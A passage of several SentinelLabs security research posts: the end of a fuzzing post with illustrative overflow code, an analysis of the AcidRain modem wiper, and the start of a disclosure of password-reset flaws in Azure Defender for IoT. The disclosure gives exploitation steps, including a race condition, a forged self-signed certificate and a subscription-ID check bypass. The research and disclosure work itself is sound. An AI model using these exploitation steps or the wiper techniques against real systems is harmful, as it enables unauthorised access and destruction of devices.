In order to check the fuzzer’s progress, we created a Python script that takes every new test case from each fuzzing instance and runs it under Intel PIN, collecting coverage that the Lighthouse plugin lets us inspect easily in IDA Pro.

We ended up finding a lot of DoS vulnerabilities which, thanks to the DataBuffer framework, turned out to be fairly harmless beyond the crash itself. Most of the DoS bugs we found were stack overflows caused by unbounded recursion.
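
To make that bug class concrete, the following is a minimal, self-contained illustration of the pattern (not actual horizon code): a parser that follows an attacker-controlled reference offset recursively, with no cycle or depth check, so a packet whose references form a loop recurses until the stack is exhausted and the dissector crashes.

#include <stddef.h>
#include <stdint.h>

/* A "reference" element points at another offset in the packet; following it
 * recursively without a visited set or depth limit lets two elements that point
 * at each other recurse until the stack is exhausted. */
static int parse_element(const uint8_t *pkt, size_t pkt_len, size_t off) {
    if (off + 2 > pkt_len)
        return 0;
    uint8_t kind = pkt[off];
    size_t next = pkt[off + 1];                        /* attacker-controlled offset */
    if (kind == 0xC0)                                  /* reference element: follow it */
        return 1 + parse_element(pkt, pkt_len, next);  /* no cycle/depth check */
    return 1;                                          /* primitive element */
}

int main(void) {
    /* Two reference elements pointing at each other: unbounded recursion. */
    uint8_t pkt[] = { 0xC0, 0x02, 0xC0, 0x00 };
    return parse_element(pkt, sizeof(pkt), 0);
}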

Although we did not fuzz all possible dissectors, we eventually found a buffer overflow vulnerability in libsnmp.so.

The vulnerability occurs in the processVarBindList function. When calling the OBJECT_IDENTIFIER_get_arcs function, the code does not properly check the return value, which is then used as a loop stop condition. This loop copies controlled data to a stack buffer.

Sending a specially crafted packet causes OBJECT_IDENTIFIER_get_arcs to fail and return -1. The conditional statement does not handle this value properly, resulting in a buffer overflow with attacker-controlled data.
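
The following self-contained sketch captures the pattern (purely illustrative; get_arcs() is a stand-in for OBJECT_IDENTIFIER_get_arcs, and this is not the actual libsnmp.so code). Because the -1 error return is never rejected, the unsigned loop bound wraps around and the copy runs far past the end of the stack buffer; running it crashes immediately.

#define MAX_ARCS 16

/* Stand-in for OBJECT_IDENTIFIER_get_arcs: returns the number of decoded arcs,
 * or -1 for a malformed OID, which is what a crafted packet triggers. */
static long get_arcs(const unsigned char *oid, unsigned long oid_len,
                     unsigned long *arcs, int slots) {
    (void)oid; (void)oid_len; (void)arcs; (void)slots;
    return -1;
}

/* In the real parser the decoded arcs are attacker-controlled data copied in a
 * loop; the missing "if (count < 0 || count > MAX_ARCS)" check is the bug. */
static void process_var_bind(const unsigned char *oid, unsigned long oid_len) {
    unsigned long arcs[MAX_ARCS] = {0};
    unsigned long out[MAX_ARCS];
    long count = get_arcs(oid, oid_len, arcs, MAX_ARCS);

    for (unsigned long i = 0; i < (unsigned long)count; i++)  /* -1 wraps to 2^64-1 */
        out[i] = arcs[i];        /* writes far past the end of the stack buffer */
}

int main(void) {
    unsigned char crafted_oid[] = { 0xff, 0xff, 0xff };
    process_var_bind(crafted_oid, sizeof(crafted_oid));
    return 0;
}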

Conclusion

The fuzzing techniques we developed here helped us to find multiple vulnerabilities in Microsoft Azure Defender for IoT. The results of our research showed that vulnerabilities in the DPI infrastructure can be triggered by simply sending a packet within the monitored network. Because the DPI infrastructure monitors the network traffic, the exploit can be directed at any device, and an attacker does not need direct access to the sensor itself, which makes these kinds of vulnerabilities all the more dangerous.

More generally, we hope the techniques described in this post will help others to develop their own advanced fuzzers, find currently unknown vulnerabilities and improve the security of closed-source products.

✇SentinelLabs

AcidRain | A Modem Wiper Rains Down on Europe

By: Juan Andrés Guerrero-Saade

By Juan Andres Guerrero-Saade (@juanandres_gs) and Max van Amerongen (@maxpl0it)

Executive Summary

  • On Thursday, February 24th, 2022, a cyber attack rendered Viasat KA-SAT modems inoperable in Ukraine.
  • Spillover from this attack rendered 5,800 Enercon wind turbines in Germany unable to communicate for remote monitoring or control.
  • Viasat’s statement on Wednesday, March 30th, 2022 provides a somewhat plausible but incomplete description of the attack.
  • SentinelLabs researchers discovered new malware that we named ‘AcidRain’.
  • AcidRain is an ELF MIPS malware designed to wipe modems and routers.
  • We assess with medium confidence that there are developmental similarities between AcidRain and a VPNFilter stage 3 destructive plugin. In 2018, the FBI and Department of Justice attributed the VPNFilter campaign to the Russian government.
  • AcidRain is the 7th wiper malware associated with the Russian invasion of Ukraine.
  • Update: In a statement disseminated to journalists, Viasat confirmed the use of the AcidRain wiper in the February 24th attack against their modems.

Context

The Russian invasion of Ukraine has included a wealth of cyber operations that have tested our collective assumptions about the role that cyber plays in modern warfare. Some commentators have voiced a bizarre disappointment at the ‘lack of cyber’ while those at the coalface are overwhelmed by the abundance of cyber operations accompanying conventional warfare. From the beginning of 2022, we have dealt with six different strains of wiper malware targeting Ukraine: WhisperKill, WhisperGate, HermeticWiper, IsaacWiper, CaddyWiper, and DoubleZero. These attacks are notable on their own. But there’s been an elephant in the room by way of the rumored ‘satellite modem hack’. This particular attack goes beyond Ukraine.

We first became aware of an issue with Viasat KA-SAT routers due to a reported outage of 5,800 Enercon wind turbines in Germany. To clarify, the wind turbines themselves were not rendered inoperable but “remote monitoring and control of the wind turbines” became unavailable due to issues with satellite communications. The timing coincided with the Russian invasion of Ukraine and suspicions arose that an attempt to take out Ukrainian military command-and-control capabilities by hindering satellite connectivity spilled over to affect German critical infrastructure. No technical details became available; technical speculation has been rampant.

On Wednesday, March 30th, 2022, Viasat finally released a statement stating that the attack took place in two phases: first, a denial of service attack coming from “several SurfBeam2 and SurfBeam2+ modems and […other on-prem equipment…] physically located within Ukraine” that temporarily knocked KA-SAT modems offline; then, the gradual disappearance of modems from the Viasat service. The actual service provision is part of a complex arrangement in which Eutelsat provides the service, but it’s administered by an Italian company called Skylogic as part of a transition plan.

The Viasat Explanation

At the time of writing, Viasat has not provided any technical indicators or an incident response report. They did provide a general sense of the attack chain, with conclusions that are difficult to reconcile.

Viasat reports that the attackers exploited a misconfigured VPN appliance, gained access to the trust management segment of the KA-SAT network, moved laterally, then used their access to “execute legitimate, targeted management commands on a large number of residential modems simultaneously”. Viasat goes on to add that “these destructive commands overwrote key data in flash memory on the modems, rendering the modems unable to access the network, but not permanently unusable”.

It remains unclear how legitimate commands could have such a disruptive effect on the modems. Scalable disruption is more plausibly achieved by pushing an update, script, or executable. It’s also hard to envision how legitimate commands would either enable the DoS effects or render the devices unusable yet not permanently bricked.

In effect, the preliminary Viasat incident report posits an attack tool with the following requirements:

  1. It could be pushed via the KA-SAT management segment onto modems en masse.
  2. It would overwrite key data in the modem’s flash memory.
  3. It would render the devices unusable, in need of a factory reset or replacement, but not leave them permanently unusable.

With those requirements in mind, we postulate an alternative hypothesis: The threat actor used the KA-SAT management mechanism in a supply-chain attack to push a wiper designed for modems and routers. A wiper for this kind of device would overwrite key data in the modem’s flash memory, rendering it inoperable and in need of reflashing or replacing.

Subsequent to this post being published, Viasat confirmed to journalists that our analysis was consistent with their reports.

Viasat told BleepingComputer that “The analysis in the SentinelLabs report regarding the ukrop binary is consistent with the facts in our report – specifically, SentinelLabs identifies the destructive executable that was run on the modems using a legitimate management command as Viasat previously described”.

The AcidRain Wiper

On Tuesday, March 15th, 2022, a suspicious upload caught our attention. A MIPS ELF binary was uploaded to VirusTotal from Italy with the name ‘ukrop’. We didn’t know how to parse the name accurately. Possible interpretations include a shorthand for “ukr”aine “op”eration, the acronym for the Ukrainian Association of Patriots, or a Russian ethnic slur for Ukrainians – ‘Укроп’. Only the incident responders in the Viasat case could say definitively whether this was in fact the malware used in this particular incident. We posit its use as a fitting hypothesis and will describe its functionality, quirky development traits, and possible overlaps with previous Russian operations in need of further research.

Technical Overview

SHA256 9b4dfaca873961174ba935fddaf696145afe7bbf5734509f95feb54f3584fd9a
SHA1 86906b140b019fdedaaba73948d0c8f96a6b1b42
MD5 ecbe1b1e30a1f4bffaf1d374014c877f
Name ukrop
Magic ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
First Seen 2022-03-15 15:08:02 UTC

AcidRain’s functionality is relatively straightforward and takes a brute-force approach, which possibly signifies that the attackers were either unfamiliar with the particulars of the target firmware or wanted the tool to remain generic and reusable. The binary performs an in-depth wipe of the filesystem and various known storage device files. If the code is running as root, AcidRain first performs a recursive overwrite and delete of non-standard files in the filesystem.

Recursively delete files in nonstandard folders

Following this, it attempts to destroy the data in the following storage device files:

Targeted Device(s) – Description
/dev/sd* – A generic block device
/dev/mtdblock* – Flash memory (common in routers and IoT devices)
/dev/block/mtdblock* – Another potential way of accessing flash memory
/dev/mtd* – The device file for flash memory that supports fileops
/dev/mmcblk* – For SD/MMC cards
/dev/block/mmcblk* – Another potential way of accessing SD/MMC cards
/dev/loop* – Virtual block devices

This wiper iterates over all possible device file identifiers (e.g., mtdblock0 – mtdblock99), opens the device file, and either overwrites it with up to 0x40000 bytes of data or (in the case of the /dev/mtd* device file) uses the following IOCTLS to erase it: MEMGETINFO, MEMUNLOCK, MEMERASE, and MEMWRITEOOB. In order to make sure that these writes have been committed, the developers run an fsync syscall.

The code that generates the malicious data used to overwrite storage

When the overwriting method is used instead of the IOCTLs, it copies from a memory region initialized as an array of 4-byte integers starting at 0xffffffff and decrementing at each index. This matches what others had seen after the exploit had taken place.
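
As a quick illustration of that pattern (a reconstruction based on the description above, not AcidRain’s own code), the buffer is simply an array of 32-bit values counting down from 0xFFFFFFFF; dumping its first words reproduces the byte sequence observed on wiped modems.

#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

#define WIPE_SIZE 0x40000

int main(void) {
    static uint32_t pattern[WIPE_SIZE / sizeof(uint32_t)];

    /* 0xffffffff, 0xfffffffe, 0xfffffffd, ... exactly what wiped flash dumps show. */
    for (uint32_t i = 0; i < WIPE_SIZE / sizeof(uint32_t); i++)
        pattern[i] = 0xFFFFFFFFu - i;

    for (int i = 0; i < 4; i++)
        printf("%08" PRIx32 "\n", pattern[i]);
    return 0;
}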

Side-by-side comparison of a Surfbeam2 modem pre- and post-attack

The code for both erasure methods can be seen below:

Mechanisms to erase devices: write 0x40000 (left) or use MEM* IOCTLS (right)

Once the various wiping processes are complete, the device is rebooted.

Redundant attempts to reboot the device

This results in the device being rendered inoperable.

An Interesting Oddity

Despite what the Ukraine invasion has taught us, wiper malware is relatively rare. More so wiper malware aimed at routers, modems, or IoT devices. The most notable case is VPNFilter, a modular malware aimed at SOHO routers and QNAP storage devices, discovered by Talos. This was followed by an FBI indictment attributing the operation to Russia (APT28, in particular). More recently, the NSA and CISA attributed VPNFilter to Sandworm (a different threat actor attributed to the same organization, the Russian GRU) as the U.K.’s National Cyber Security Centre (NCSC) described VPNFilter’s successor, Cyclops Blink.

VPNFilter included an impressive array of functionality in the form of multi-stage plugins selectively deployed to the infected devices. The functionality ranges from credential theft to monitoring Modbus SCADA protocols. Among its many plugins, it also included functionality to wipe and brick devices as well as DDoS a target.

The reason we bring up the specter of VPNFilter is not because of its superficial similarities to AcidRain but rather because of an interesting (but inconclusive) code overlap between a specific VPNFilter plugin and AcidRain.

VPNFilter Stage 3 Plugin – ‘dstr’

SHA256 47f521bd6be19f823bfd3a72d851d6f3440a6c4cc3d940190bdc9b6dd53a83d6
SHA1 261d012caa96d3e3b059a98388f743fb8d39fbd5
MD5 20ea405d79b4de1b90de54a442952a45
Description VPNFilter Stage 3, ‘dstr’ module
Magic ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
First Seen 2018-06-06 13:02:56 UTC

After the initial discovery of VPNFilter, additional plugins were revealed by researchers attempting to understand the massive spread of the botnet and its many intricacies. Among these were previously unknown plugins, including ‘dstr’. As the mangled name suggests, it’s a ‘destruction’ module meant to supplement stage 2 plugins that lacked the ‘kill’ command meant to wipe the devices.

This plugin was initially brought to our attention by tlsh fuzzy hashing, a more recent matching library that has proven far more effective than ssdeep or imphash at identifying similar samples. The similarity to AcidRain was 55%, with no other samples flagged in the VT corpus. This alone is not nearly enough to conclusively judge the two samples as tied, but it did warrant further investigation.

VPNFilter and AcidRain are both notably similar and dissimilar. They’re both MIPS ELF binaries and the bulk of their shared code appears to stem from statically-linked libc. It appears that they may also share a compiler, most clearly evidenced by the identical Section Headers Strings Tables.

Section Headers Strings Tables for VPNFilter and AcidRain

And there are other development quirks, such as the storing of the previous syscall number to a global location before a new syscall. At this time, we can’t judge whether this is a shared compiler optimization or a strange developer quirk.

More notably, while VPNFilter and AcidRain work in very different ways, both binaries make use of the MEMGETINFO, MEMUNLOCK, and MEMERASE IOCTLS to erase mtd device files.

On the left, AcidRain; on the right, VPNFilter

There are also notable differences between VPNFilter’s ‘dstr’ plugin and AcidRain. The latter appears to be a far sloppier product that doesn’t consistently rise to the coding standards of the former. For example, note the redundant use of process forking and needless repetition of operations.

They also appear to serve different purposes, with the VPNFilter plugin targeting specific devices with hardcoded paths, and AcidRain taking more of a “one-binary-fits-all” approach to wiping devices. By brute forcing device filenames, the attackers can more readily reuse AcidRain against more diverse targets.

We invite the research community to stress test this developmental overlap and contribute their own findings.

Conclusions

As we consider what’s possibly the most important cyber attack in the ongoing Russian invasion of Ukraine, there are many open questions. Despite Viasat’s statement claiming that there was no supply-chain attack or use of malicious code on the affected routers, we posit the more plausible hypothesis that the attackers deployed AcidRain (and perhaps other binaries and scripts) to these devices in order to conduct their operation.

While we cannot definitively tie AcidRain to VPNFilter (or the larger Sandworm threat cluster), we note a medium-confidence assessment of non-trivial developmental similarities between their components and hope the research community will continue to contribute their findings in the spirit of collaboration that has permeated the threat intelligence industry over the past month.

References

https://www.wired.com/story/viasat-internet-hack-ukraine-russia/
https://www.cisa.gov/uscert/ncas/alerts/aa22-076a
https://media.defense.gov/2022/Jan/25/2002927101/-1/-1/0/CSA_PROTECTING_VSAT_COMMUNICATIONS_01252022.PDF
https://www.airforcemag.com/hackers-attacked-satellite-terminals-through-management-network-viasat-officials-say/
https://nps.edu/documents/104517539/104522593/RELIEF12-4_QLR.pdf/9cc03d09-9af4-410e-b601-a8bffdae0c30
https://www.reuters.com/business/media-telecom/exclusive-hackers-who-crippled-viasat-modems-ukraine-are-still-active-company-2022-03-30/
https://www.viasat.com/about/newsroom/blog/ka-sat-network-cyber-attack-overview/
https://blog.talosintelligence.com/2018/05/VPNFilter.html
https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1
https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html
https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf
https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html
https://www.cisa.gov/uscert/ncas/alerts/aa22-054a

✇SentinelLabs

Pwning Microsoft Azure Defender for IoT | Multiple Flaws Allow Remote Code Execution for All

By: Kasif Dekel

By Kasif Dekel and Ronen Shustin (independent researcher)

Executive Summary

  • SentinelLabs has discovered a number of critical severity flaws in Microsoft Azure’s Defender for IoT affecting cloud and on-premise customers.
  • Unauthenticated attackers can remotely compromise devices protected by Microsoft Azure Defender for IoT by abusing vulnerabilities in Azure’s Password Recovery mechanism.
  • SentinelLabs’ findings were proactively reported to Microsoft in June 2021. The vulnerabilities are tracked as CVE-2021-42310, CVE-2021-42312, CVE-2021-37222, CVE-2021-42313 and CVE-2021-42311, marked as critical, some with a CVSS score of 9.8.
  • Microsoft has released security updates to address these critical vulnerabilities. Users are encouraged to take action immediately.
  • At this time, SentinelLabs has not discovered evidence of in-the-wild abuse.

Introduction

Operational technology (OT) networks power many of the most critical aspects of our society; however, many of these technologies were not designed with security in mind and can’t be protected with traditional IT security controls. Meanwhile, the Internet of Things (IoT) is enabling a new wave of innovation with billions of connected devices, increasing the attack surface and risk.

The problem has not gone unnoticed by vendors, and many offer security solutions in an attempt to address it, but what if the security solution itself introduces vulnerabilities? In this report, we will discuss critical vulnerabilities found in Microsoft Azure Defender for IoT, a security product for IoT/OT networks by Microsoft Azure.

First, we show how flaws in the password reset mechanism can be abused by remote attackers to gain unauthorized access. Then, we discuss multiple SQL injection vulnerabilities in Defender for IoT that allow remote attackers to gain access without authentication. Ultimately, our research raises serious questions about the security of security products themselves and their overall effect on the security posture of vulnerable sectors.

Microsoft Azure Defender For IoT

Microsoft Defender for IoT is an agentless, network-layer security solution for continuous IoT/OT asset discovery, vulnerability management, and threat detection that does not require changes to existing environments. It can be deployed fully on-premises or in Azure-connected environments.

Source: Microsoft Azure Defender for IoT architecture

This solution consists of two main components:

  • Microsoft Azure Defender For IoT Management – Enables SOC teams to manage and analyze alerts aggregated from multiple sensors into a single dashboard and provides an overall view of the health of the networks.
  • Microsoft Azure Defender For IoT Sensor – Discovers and continuously monitors network devices. Sensors collect ICS network traffic using passive (agentless) monitoring on IoT and OT devices. Sensors connect to a SPAN port or network TAP and immediately begin performing DPI (Deep packet inspection) on IoT and OT network traffic.

Both components can be either installed on a dedicated appliance or on a VM.

Deep packet inspection (DPI) is achieved via the horizon component, which is responsible for analyzing network traffic. The horizon component loads built-in dissectors and can be extended to add custom network protocol dissectors.

Defender for IoT Web Interface Attack Surface

Both the management and the sensor share roughly the same code base, with configuration changes to fit the purpose of the machine. This is the reason why both machines are affected by most of the same vulnerabilities.

The most appealing attack surface exposed on both machines is the web interface, which allows controlling the environment in an easy way. The sensor additionally exposes another attack surface which is the DPI service (horizon) that parses the network traffic.

After installing and configuring the management and sensors, we are greeted with the login page of the web interface.

The same credentials are also used as the login credentials for the SSH server, which gives us some more insight into how the system works. The first thing we want to do is obtain the sources to see what is happening behind the scenes, so how do we get those?

Defender for IoT is a product formerly known as CyberX, acquired by Microsoft in 2020. Looking around in the home directory of the “cyberx” user, we found the installation script and a tar archive containing the system’s encrypted files. Reading the script, we found the command that decrypts the archive file. A minified version:

openssl enc -d -aes256 -in ./product.tar.gz -md sha512 -k <KEY> | tar xz -C <TARGET_DIR>

The decryption key is shared across all installations.

After extracting the data, we found the sources for the web interface (written in Python) and got to work.

We first aimed to find any exposed unauthenticated APIs and look for vulnerabilities there.

Finding Potentially Vulnerable Controllers

The urls.py file contains the main routes for the web application:

xsense_routes = [
    ['handshake', XSenseHandshakeApiHandler]
]
 
xsense_v17_routes = [
    ['sync', xsense_v17.XSenseSyncApiHandler]
]
 
upgrade_v1_routes = [
    ['status', upgrade_v1.RemoteUpgradeStatusApiHandler],
    ['upgrade-log', upgrade_v1.RemoteUpgradeLogFileApiHandler]
]
 
token_v1_routes = [
    ['verify', token_v1.TokenVerificationHandlers],
    ['update-handshake', token_v1.UpdateHandshakeHandlers],
]
 
frontend_routes = [
 
    ['alerts', AlertsApiHandler],
    ['alerts/(?P[0-9]*)', AlertsApiHandler],
    ['alerts/scenarios', AlertScenariosApiHandler],
    <redacted>
]
management_routs = [
    ['backup/sync', ManagementApiHandler],
    ['backup/package', ManagementApiBackupHandler],
    ['backup/maintenance', MaintenanceApiHandler]
]
<redacted>

Using JetBrains IntelliJ’s class hierarchy feature, we can easily identify route controllers that do not require authentication.

Route controllers that do not require authentication

Every controller that inherits from BaseHandler and does not validate authentication or require a secret token is a good candidate at this point. Some controllers drew our attention in particular.

Understanding Azure’s Password Recovery Mechanism

The password recovery mechanism for both the management and sensor operates as follows:

  1. Access to management/sensor URL (e.g., https://ip/login#/dashboard)
  2. Go to the “Password Recovery” page.
  3. Copy the ApplianceID provided on this page to the Azure console and download a signed password reset ZIP file.
  4. Upload the signed ZIP file to the management/sensor Password Recovery page using the form mentioned in Step 2. This ZIP contains digitally-signed proof that the user is the owner of this machine, by way of digital certificates and signed data.
  5. A new password is generated and displayed to the user.

Under the hood:

  1. The actual process is divided into two requests to the management/sensor server:
    1. Upload of the signed ZIP proof
    2. Password recovery
  2. When a ZIP file is uploaded, it is being extracted to the /var/cyberx/reset_password directory (handled by ZipFileConfigurationApiHandler).
  3. When a password recovery request is being processed, the server performs the following operations:
    1. The PasswordRecoveryApiHandler controller validates the certificates, checking that they are properly signed by a Root CA. In addition, it checks whether these certificates belong to Azure servers.
    2. A request is sent to an internal Tomcat server to further validate the properties of the machine.
    3. If all checks pass properly, PasswordRecoveryApiHandler generates a new password and returns it to the user.

The ZIP contains the following files:

  • IotDefenderSigningCertificate.pem – Azure public key, used to verify the data signature in ResetPassword.json, signed by issuer.pem.
  • Issuer.pem – Signs IotDefenderSigningCertificate.pem, signed by a trusted root CA.
  • ResetPassword.json – JSON application data, properties of the machine.

The content of the ResetPassword.json file looks as follows:

{
  "properties": {
    "tenantId": "<TENANTID>",
    "subscriptionId": "<SUBSCRIPTIONID>",
    "type": "PasswordReset",
    "applianceId": "<APPLIANCEID>",
    "issuanceDate": "<ISSUANCEDATA>"
  },
  "signature": "<BASE64_SIGNATURE>"
}

According to Step 2, the code that processes file uploads to the reset_password directory (components\xsense-web\cyberx_web\api\admin.py:1508) looks as follows:

class ZipFileConfigurationApiHandler(BaseHandler):
    def _post(self):
        path = self.request.POST.get('path')
        approved_path = ['licenses', 'reset_password']
 
        if path not in approved_path:
            raise Exception("provided path is not approved")
 
        path = os.path.join('/var/cyberx', path)
        cyberx_common.clear_directory_content(path)
 
        files = self.request.FILES
        for file_name in files:
            license_zip = files[file_name]
            zf = zipfile.ZipFile(license_zip)
            zf.extractall(path=path)

As shown, the code extracts the user-delivered ZIP into the mentioned directory. The following code handles the password recovery requests (cyberx python library file django_helpers.py:576):

class PasswordRecoveryApiHandler(BaseHandler):
    def _get(self):
        global host_id
 
        if not host_id:
            host_id = common.get_system_id()
            host_id = common.add_dashes(host_id)
 
        return {
            'instanceId': host_id
        }
 
    def _post(self):
        print 'resetting user password'
        result = {}
        try:
            body = self.parse_body()
            user = body.get('user')
 
            if user != 'cyberx' and user != 'support':
                raise Exception('Invalid user')
 
            try:
                self._try_reset_password() 
            except Exception as e:
                logging.error('could not verify activation certificate, error {}'.format(e.message))
                result = {
                    "internalSystemErrorMessage": '',
                    "userDisplayErrorMessage": 'This password recovery file is invalid.' +
                                                  'Download a new file. If this does not work, contact support.'
                }
 
            url = "http://127.0.0.1:9090/core/api/v1/login/reset-password"
            r = requests.post(url=url)
            r.raise_for_status()
 
            # Reset passwords
 
            user_new_password = common.generate_password()
            self._set_user_password(user, user_new_password)
 
            if not result:
                result = {
                    'newPassword': user_new_password
                }
        finally:
            clear_directory_content('/var/cyberx/reset_password')
 
        return result

The function first validates the provided user and calls the function _try_reset_password:

 def _try_reset_password(self):
        license_signing_certificate_path = os.path.join(RESET_PASSWORD_DIR_PATH, SIGNING_CERTIFICATE_FILE_NAME)
        intermediate_issuer_certificate_path = os.path.join(RESET_PASSWORD_DIR_PATH, ISSUER_CERTIFICATE_FILE_NAME)
 
        cert_data = ssl.verify_certificate(intermediate_issuer_certificate_path, license_signing_certificate_path)
        certificate = load_certificate(FILETYPE_PEM, cert_data)
        print 'validating subject'
        ssl.verify_subject(certificate)
        print 'validating issuer'
        ssl.verify_issuer(certificate)

Internally, this code validates the certificates, including the issuer.

Afterwards, a request to an internal API http://127.0.0.1:9090/core/api/v1/login/reset-password is made and handled by a Java component that eventually executes the following code:

public class ResetPasswordManager {
  private static final Logger LOGGER = LoggerFactory.getLogger(ResetPasswordManager.class);
  private static final String RESET_PASSWORD_CERTIFICATE_PATH = "/var/cyberx/reset_password/IotDefenderSigningCertificate.pem"; 
  private static final String RESET_PASSWORD_JSON_PATH = "/var/cyberx/reset_password/ResetPassword.json";
  
  private static final ActivationConfiguration ACTIVATION_CONFIGURATION = new ActivationConfiguration();
  
  public static void resetPassword() throws Exception {
    LOGGER.info("Trying to reset password");
    JSONObject resetPasswordJson = new JSONObject(FileUtils.read("/var/cyberx/reset_password/ResetPassword.json"));
    ResetPasswordProperties resetPasswordProperties = (ResetPasswordProperties)JsonSerializer.fromString(resetPasswordJson
        .getJSONObject("properties").toString(), ResetPasswordProperties.class);
    boolean signatureValid = CryptographyUtils.isSignatureValid(JsonSerializer.toString(resetPasswordProperties).getBytes(StandardCharsets.UTF_8), resetPasswordJson
        .getString("signature"), "/var/cyberx/reset_password/IotDefenderSigningCertificate.pem");
    if (!signatureValid) {
      LOGGER.error("Signature validation failed");
      throw new Exception("This signature file is not valid");
    } 
    String subscriptionId = resetPasswordProperties.getSubscriptionId();
    String machineSubscriptionId = ACTIVATION_CONFIGURATION.getSubscriptionId();
    if (!machineSubscriptionId.equals("") && 
      !machineSubscriptionId.contains(resetPasswordProperties.getSubscriptionId())) {
      LOGGER.error("Subscription ID didn't match");
      throw new Exception("This signature file is not valid");
    } 
    DateTime issuanceDate = 
 
DateTimeFormat.forPattern("MM/dd/yyyy").parseDateTime(resetPasswordProperties.getIssuanceDate()).withTimeAtStartOfDay();
    if (DateTime.now().withTimeAtStartOfDay().minusDays(7).isAfter((ReadableInstant)issuanceDate)) {
      LOGGER.error("Password reset file expired");
      throw new Exception("Password reset file expired");
    } 
    if (!Environment.getSensorUUID().replace("-", "").equals(resetPasswordProperties.getApplianceId().trim().toLowerCase().replace("-", ""))) {
      LOGGER.error("Appliance id not equal to real uuid");
      throw new Exception("Appliance id not equal to real uuid");
    } 
  }
}

This code validates the password reset files yet again. This time it also validates the signature of the ResetPassword.json file and its properties.

If all goes well and the Java API returns 200 OK status code, the PasswordRecoveryApiHandler controller proceeds and generates a new password and returns it to the user.

Vulnerabilities in Defender for IOT

As shown, the password recovery mechanism consists of two main entities:

  • The Python web API (external)
  • The Java web API (tomcat, internal)

This introduces a time-of-check-time-of-use (TOCTOU) vulnerability, since no synchronization mechanism is applied.

As mentioned, the reset password mechanism starts with a ZIP file upload. This primitive lets us upload and extract any files to the /var/cyberx/reset_password directory.

There is a window of opportunity in this flow: the files in /var/cyberx/reset_password can be swapped between the first verification (Python API) and the second verification (Java API). The Python API validates files that are correctly signed by Azure certificates; the Java API then processes the replaced, specially crafted files, falsely approves their authenticity, and returns the 200 OK status code.

The password recovery Java API contains logical flaws that let specially-crafted payloads bypass all verifications.

The Java API validates the signature of the JSON file (same code as above):

JSONObject resetPasswordJson = new JSONObject(FileUtils.read("/var/cyberx/reset_password/ResetPassword.json"));
    ResetPasswordProperties resetPasswordProperties = (ResetPasswordProperties)JsonSerializer.fromString(resetPasswordJson
        .getJSONObject("properties").toString(), ResetPasswordProperties.class);
    boolean signatureValid = CryptographyUtils.isSignatureValid(JsonSerializer.toString(resetPasswordProperties).getBytes(StandardCharsets.UTF_8), resetPasswordJson
        .getString("signature"), "/var/cyberx/reset_password/IotDefenderSigningCertificate.pem");
    if (!signatureValid) {
      LOGGER.error("Signature validation failed");
      throw new Exception("This signature file is not valid");
    } 

The issue here is that, unlike the Python API verification, it doesn’t verify the IotDefenderSigningCertificate.pem certificate itself. It only checks that the signature in the JSON file was produced by the attached certificate file. This introduces a major flaw.

An attacker can therefore generate a self-signed certificate and sign the ResetPassword.json payload that will pass the signature verification.

As already mentioned, the ResetPassword.json looks like the following:

{
  "properties": {
    "tenantId": "<TENANTID>",
    "subscriptionId": "<SUBSCRIPTIONID>",
    "type": "PasswordReset",
    "applianceId": "<APPLIANCEID>",
    "issuanceDate": "<ISSUANCEDATA>"
  },
  "signature": "<BASE64_SIGNATURE>"
}

Afterwards, there is a subscription ID check:

  String subscriptionId = resetPasswordProperties.getSubscriptionId();
    String machineSubscriptionId = ACTIVATION_CONFIGURATION.getSubscriptionId();
    if (!machineSubscriptionId.equals("") && 
      !machineSubscriptionId.contains(resetPasswordProperties.getSubscriptionId())) {
      LOGGER.error("Subscription ID didn't match");
      throw new Exception("This signature file is not valid");
    } 

This is the only property that cannot be obtained by a remote attacker and is infeasible to guess in a reasonable time. However, this check can be easily bypassed.

The code takes the subscriptionId from the JSON file and compares it to the machineSubscriptionId. However, the code here is flawed: it checks whether machineSubscriptionId contains the subscriptionId from the user-controlled JSON file, and not the other way around. The use of .contains() is entirely insecure. The machine’s subscription ID is in the format of a GUID, which means it always contains a hyphen. This allows us to bypass the check by providing just a single hyphen character as our subscriptionId.

Next, the issuanceDate is checked, followed by ApplianceId. This is already supplied to us by the password recovery page (mentioned in Step 2).

Now we understand that we can bypass all of the checks in the Java API, meaning that we only need to successfully win the race condition and ultimately reset the password without authorization.

The fact that the ZIP upload interface and the password recovery interface are separate came in handy in the exploitation phase and let us win the race more easily.

Preparing To Attack Azure Defender For IoT

To prepare the attack we need to do the following.

  1. Obtain a legitimate password recovery ZIP file from the Azure portal. Obviously, we cannot access the Azure user that the victim machine belongs to, but we can use any Azure user and generate a “dummy” ZIP file. We only need the recovery ZIP file to obtain a legitimate certificate. This can be done at the following URL:
    https://portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Sites
    

    For that matter, we can create a new trial Azure account and generate a recovery file using that interface mentioned above. The secret identifier is irrelevant and may contain garbage.

  2. Then we need to generate a specially crafted (“bad”) ZIP file. This ZIP file will contain two files:
    • IotDefenderSigningCertificate.pem – a self-signed certificate. It can be generated by the following command:
      openssl req -x509 -nodes -newkey rsa:2048 -keyout key.pem -out IotDefenderSigningCertificate.pem -subj "/C=DE/ST=NRW/L=Berlin/O=My Inc/OU=ALEG/CN=www.example.com/[email protected]"
      
    • ResetPassword.json – properties data JSON file, signed by the self-signed certificate mentioned above and modified accordingly to bypass the Java API verifications.

This JSON file can be signed using the following Java code:

import com.cyberx.infrastructure.common.configuration.ActivationConfiguration;
import com.cyberx.infrastructure.common.serializers.JsonSerializer;
import com.cyberx.infrastructure.common.utils.CryptographyUtils;
import com.cyberx.infrastructure.common.utils.FileUtils;
import com.cyberx.infrastructure.models.pojos.ResetPasswordProperties;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import org.joda.time.DateTime;
import org.joda.time.ReadableInstant;
import org.joda.time.format.DateTimeFormat;
import org.json.JSONObject;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.apache.commons.codec.binary.Base64;
 
    public static void sign() {
